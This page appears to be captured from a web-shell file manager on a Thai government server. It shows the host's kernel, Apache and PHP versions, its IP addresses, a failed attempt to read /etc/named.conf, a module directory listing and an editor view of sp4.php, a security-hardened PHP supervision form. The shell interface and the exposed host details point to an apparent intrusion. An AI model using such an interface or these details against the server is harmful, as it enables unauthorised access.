Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
/
var /
www /
html /
amss /
modules /
supervision /
main /
Name
Size
Permission
Action
detail.php
3.16
KB
-rw-r--r--
indicator.php
30.6
KB
-rw-r--r--
livesearch1.php
795
B
-rw-r--r--
livesearch2.php
1.03
KB
-rw-r--r--
livesearch3.php
787
B
-rw-r--r--
livesearch4.php
1.02
KB
-rw-r--r--
livesearch_101.php
17.73
KB
-rw-r--r--
permission.php
11.16
KB
-rw-r--r--
report_1.php
31.11
KB
-rw-r--r--
report_2.php
29.43
KB
-rw-r--r--
report_3.php
21.18
KB
-rw-r--r--
report_4.php
5.9
KB
-rw-r--r--
report_5.php
4.04
KB
-rw-r--r--
sp1.php
62.26
KB
-rw-r--r--
sp1_mobile.php
50.04
KB
-rw-r--r--
sp2.php
6.59
KB
-rw-r--r--
sp3.php
5.75
KB
-rw-r--r--
sp4.php
5.23
KB
-rw-r--r--
standard.php
7.89
KB
-rw-r--r--
std_detail.php
8.18
KB
-rw-r--r--
std_detail2.php
9.22
KB
-rw-r--r--
supervision_activity.php
11.1
KB
-rw-r--r--
supervision_activity_number.ph...
10.05
KB
-rw-r--r--
supervision_activity_rate.php
5.49
KB
-rw-r--r--
supervision_item.php
11.3
KB
-rw-r--r--
supervision_year.php
11.12
KB
-rw-r--r--
teach_table.php
13.48
KB
-rw-r--r--
Code Editor : sp4.php
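<?php
/**
 * Supervision form (task main/sp4): stores a supervision record, an optional
 * comment and an optional attached document, then renders the entry form.
 *
 * This script relies on the including page for $connect (a mysqli link).
 *
 * Security-relevant behaviour of this version:
 *  - The login check requires a non-empty session user id and compares it
 *    strictly with the "officer" request value. The previous loose comparison
 *    treated a missing session value and a missing parameter as equal, so it
 *    did not actually require a login.
 *  - Every request value that reaches SQL is bound as a statement parameter
 *    instead of being interpolated into the query text.
 *  - The stored upload name is built only from a validated ref_id, a random
 *    number and an extension taken from the allow-list. The allow-list check
 *    and the stored extension now use the same value (the final extension);
 *    before, they were derived from different parts of the client file name.
 *  - Request values echoed into HTML or script are escaped for that context.
 *
 * NOTE(review): the direct-access guard below was already commented out in
 * the original; whether the parent defines _VALID_ is not visible from here,
 * so it is left disabled. Confirm and re-enable it if the constant exists.
 * NOTE(review): the form carries no anti-CSRF token; adding one needs support
 * from the parent application's session handling.
 */
//defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' );

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Authorisation: the caller must be logged in AND be the officer named in the request.
$session_officer = isset($_SESSION['login_user_id']) ? (string) $_SESSION['login_user_id'] : '';
$request_officer = (isset($_REQUEST['officer']) && is_scalar($_REQUEST['officer']))
    ? (string) $_REQUEST['officer']
    : '';
if ($session_officer === '' || $session_officer !== $request_officer) {
    exit();
}

if (!function_exists('sp4_run')) {
    /**
     * Prepare and execute one statement with all values bound as parameters.
     *
     * @param mysqli $connect open database link
     * @param string $sql     statement text using ? placeholders
     * @param string $types   mysqli type string, one character per parameter
     * @param array  $params  values to bind, in placeholder order
     * @return bool true when the statement executed
     */
    function sp4_run($connect, $sql, $types, array $params)
    {
        $stmt = mysqli_prepare($connect, $sql);
        if ($stmt === false) {
            return false;
        }
        // mysqli_stmt_bind_param takes its values by reference.
        $args = array($stmt, $types);
        foreach ($params as $key => $unused) {
            $args[] = &$params[$key];
        }
        call_user_func_array('mysqli_stmt_bind_param', $args);
        $ok = mysqli_stmt_execute($stmt);
        mysqli_stmt_close($stmt);
        return $ok;
    }
}

if (!function_exists('file_upload')) {
    /**
     * Store the uploaded "userfile" under a server-generated name.
     *
     * Reads $_FILES['userfile'] and $_POST['ref_id'].
     *
     * @return string|null stored file name (without directory), or null when
     *                     nothing was stored
     */
    function file_upload()
    {
        // Storage directory for uploaded files.
        // NOTE(review): this appears to sit under the web root; the web server
        // should be configured not to execute scripts from it.
        $uploaddir = 'modules/supervision/upload_files/';
        $allowed = array('doc', 'docx', 'rar', 'pdf', 'xls', 'xlsx', 'zip', 'jpg', 'gif');

        if (!isset($_FILES['userfile'])
            || !is_string($_FILES['userfile']['name'])
            || $_FILES['userfile']['error'] !== UPLOAD_ERR_OK
            || !is_uploaded_file($_FILES['userfile']['tmp_name'])) {
            return null;
        }

        // ref_id becomes part of the file name, so it must match the format
        // this page generates (digits, "x", digits) and nothing else.
        if (!isset($_POST['ref_id'])
            || !is_string($_POST['ref_id'])
            || !preg_match('/^[0-9]+x[0-9]+$/D', $_POST['ref_id'])) {
            return null;
        }

        // One extension value drives both the allow-list check and the stored name.
        $ext = strtolower(pathinfo($_FILES['userfile']['name'], PATHINFO_EXTENSION));
        if (!in_array($ext, $allowed, true)) {
            return null;
        }

        $name = $_POST['ref_id'] . rand() . '.' . $ext;
        $target = $uploaddir . $name;

        // Move straight to the generated name; the client-supplied file name
        // is never used as a path on disk.
        if (!move_uploaded_file($_FILES['userfile']['tmp_name'], $target)) {
            return null;
        }

        if ($ext === 'jpg' || $ext === 'gif') {
            // A file with an image extension must actually parse as an image.
            $size = getimagesize($target);
            if ($size === false) {
                unlink($target);
                return null;
            }

            // Shrink wide JPEGs to 800px width, keeping the aspect ratio.
            if ($ext === 'jpg' && $size[0] > 800) {
                $ori_w = $size[0];
                $ori_h = $size[1];
                $new_w = 800;
                $new_h = round(($new_w / $ori_w) * $ori_h);
                $ori_img = imagecreatefromjpeg($target);
                if ($ori_img !== false) {
                    $new_img = imagecreatetruecolor($new_w, $new_h);
                    imagecopyresized($new_img, $ori_img, 0, 0, 0, 0, $new_w, $new_h, $ori_w, $ori_h);
                    imagejpeg($new_img, $target);
                    imagedestroy($ori_img);
                    imagedestroy($new_img);
                }
            }
        }

        return $name;
    }
}

if (isset($_POST['ref_id'])) {
    // Reject a ref_id that this page could not have generated.
    if (!is_string($_POST['ref_id']) || !preg_match('/^[0-9]+x[0-9]+$/D', $_POST['ref_id'])) {
        exit();
    }
    $post_ref_id = $_POST['ref_id'];
    $school_index = (isset($_POST['school_index']) && is_scalar($_POST['school_index']))
        ? (string) $_POST['school_index']
        : '';
    $comment = (isset($_POST['comment']) && is_scalar($_POST['comment']))
        ? (string) $_POST['comment']
        : '';

    $rec_date = date("Y-m-d");

    // Active supervision year (no request input in this query).
    $sql_year = "select year from supervision_year where year_active='1' ";
    $dbquery_year = mysqli_query($connect, $sql_year);
    $result_year = $dbquery_year ? mysqli_fetch_array($dbquery_year) : null;
    $year = $result_year ? (string) $result_year['year'] : '';

    // Active supervision item (no request input in this query).
    $sql_item = "select id from supervision_item where item_active='1' ";
    $dbquery_item = mysqli_query($connect, $sql_item);
    $result_item = $dbquery_item ? mysqli_fetch_array($dbquery_item) : null;
    $item = $result_item ? (string) $result_item['id'] : '';

    // person_id: first person of the school by position_code; school code is bound.
    $person_id = '';
    $stmt_person = mysqli_prepare(
        $connect,
        "select person_id from person_sch_main where school_code=? and status='0' order by position_code limit 1"
    );
    if ($stmt_person !== false) {
        mysqli_stmt_bind_param($stmt_person, 's', $school_index);
        if (mysqli_stmt_execute($stmt_person)) {
            mysqli_stmt_bind_result($stmt_person, $found_person_id);
            if (mysqli_stmt_fetch($stmt_person)) {
                $person_id = (string) $found_person_id;
            }
        }
        mysqli_stmt_close($stmt_person);
    }

    // The assessor is the authenticated officer, not a separately posted value.
    sp4_run(
        $connect,
        "insert into supervision_main(level,standard_year,person_id,school_id,ref_id,item,assessor,rec_date,status) values ('3',?,?,?,?,?,?,?,'1')",
        'sssssss',
        array($year, $person_id, $school_index, $post_ref_id, $item, $session_officer, $rec_date)
    );

    if ($comment !== "") {
        sp4_run(
            $connect,
            "insert into supervision_comment(ref_id,person_id,comment,rec_date) values (?,?,?,?)",
            'ssss',
            array($post_ref_id, $person_id, $comment, $rec_date)
        );
    }

    if (isset($_FILES['userfile']) && is_string($_FILES['userfile']['name']) && $_FILES['userfile']['name'] != "") {
        $file = file_upload();
        // Record the attachment only when a file was really stored.
        if (is_string($file)) {
            sp4_run(
                $connect,
                "insert into supervision_file(ref_id,file_name) values (?,?)",
                'ss',
                array($post_ref_id, $file)
            );
        }
    }

    // Redirect back to the overview; values are URL-encoded and the URL is
    // emitted as a JSON string literal so it cannot break out of the script.
    $redirect = '?option=supervision&task=main/sp1&school_index=' . rawurlencode($school_index)
        . '&person_index=' . rawurlencode($person_id);
    echo "<script>document.location.href="
        . json_encode($redirect, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)
        . ";</script>\n";
}

// ref_id for the next submission: current timestamp, "x", random number.
$timestamp = mktime(date("H"), date("i"), date("s"), date("m"), date("d"), date("Y"));
$rand_number = rand();
$ref_id = $timestamp . "x" . $rand_number;

// Values echoed into attributes are HTML-escaped.
$form_ref_id = htmlspecialchars($ref_id, ENT_QUOTES, 'UTF-8');
$form_school_index = htmlspecialchars(
    (isset($_GET['school_index']) && is_scalar($_GET['school_index'])) ? (string) $_GET['school_index'] : '',
    ENT_QUOTES,
    'UTF-8'
);
$form_officer = htmlspecialchars(
    (isset($_GET['officer']) && is_scalar($_GET['officer'])) ? (string) $_GET['officer'] : '',
    ENT_QUOTES,
    'UTF-8'
);

echo "<form Enctype = 'multipart/form-data' id='frm2' name='frm2' action='?option=supervision&task=main/sp4&index=4' method=post>";
echo "<Br><Br>";
echo "<Table width='300' Border='0' align='center'>";
echo "<Tr align='left'><Td ></Td><Td align='right'>นิเทศ </Td><Td><textarea rows='10' cols='35' name='comment'></textarea></Td></Tr>";
echo "<tr align='left'>";
echo "<Td ></Td><td align='right'>เอกสาร </td>";
echo "<td align='left'><input name = 'userfile' type = 'file'></td>";
echo "</tr>";
echo "<tr align='left' height='70'>";
echo "<Td ></Td><td></td><td align='left'>";
// The submit tag was missing its closing ">" in the original markup.
echo "<INPUT TYPE='submit' name='smb' id='submit' value='ตกลง' class='submit'>";
echo "</td></tr>";
echo "</Table>";
echo "<INPUT TYPE='Hidden' name='ref_id' value='$form_ref_id'>";
echo "<INPUT TYPE='Hidden' name='school_index' value='$form_school_index'>";
echo "<INPUT TYPE='Hidden' name='officer' value='$form_officer'>";
echo "</form>";
?>
<script>
function goto_upload(val){
    if(val==1){
        callfrm2();
    }
}

function callfrm2() {
    frm2.target = "_self";
    frm2.method = "POST";
    document.getElementById("frm2").submit();
    //return false;
}
</script>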